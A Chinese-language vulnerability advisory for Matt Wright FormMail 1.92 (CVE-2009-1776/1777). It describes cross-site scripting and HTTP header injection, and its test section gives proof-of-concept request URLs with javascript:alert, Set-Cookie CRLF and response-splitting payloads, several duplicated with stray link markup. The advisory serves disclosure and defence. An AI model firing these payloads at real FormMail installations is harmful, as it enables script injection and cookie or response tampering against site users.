发布日期:2009-05-12
更新日期:2009-05-14
受影响系统:
Matt Wright FormMail 1.92
描述:
BUGTRAQ ID:
34929CVE(CAN) ID:
CVE-2009-1776,
CVE-2009-1777FormMail是一款用perl实现的基于WEB的邮件网关,可以运行于大多数Linux/Unix以及Windows等多种系统平台。
FormMail.pl模块没有正确地验证用户所提交的request和return_link_url参数,远程攻击者可以通过提交恶意请求执行跨站脚本攻击,或在返回给用户的响应中包含任意HTTP头。
<*来源:Francesco Ongaro (
ascii@ush.it)
链接:
http://secunia.com/advisories/35068/ http://marc.info/?l=bugtraq&m=124214294303546&w=2*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
foobar@example.com&subject=1&redirect=javascript:alert(%27USH%27);" target="_blank">http://www.example.com/FormMail.pl?recipient=
foobar@example.com&subject=1&redirect=javascript:alert(%27USH%27);
foobar@example.com&subject=1&return_link_url=javascript:alert(%27USH%27);&return_link_title=USH" target="_blank">http://www.example.com/FormMail.pl?recipient=
foobar@example.com&subject=1&return_link_url=javascript:alert(%27USH%27);&return_link_title=USH
foobar@example.com&subject=1&redirect=http://www.example.com%0D%0aSet-Cookie:auth%3DUSH;vuln%3DHTTPHeaderInjection;" target="_blank">http://www.example.com/FormMail.pl?recipient=
foobar@example.com&subject=1&redirect=http://www.example.com%0D%0aSet-Cookie:auth%3DUSH;vuln%3DHTTPHeaderInjection;
foobar@example.com&subject=1&redirect=http://www.example.com%0D%0A%0FContent-Length:%200%0D%0AContent-Type:%20text/plain%0D%0AStatus:302%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:%20text/plain%0D%0Ahttp://www.example.com" target="_blank">http://www.example.com/FormMail.pl?recipient=
foobar@example.com&subject=1&redirect=http://www.example.com%0D%0A%0FContent-Length:%200%0D%0AContent-Type:%20text/plain%0D%0AStatus:302%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:%20text/plain%0D%0Ahttp://www.example.com
建议:
厂商补丁:
Matt Wright
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://worldwidemart.com/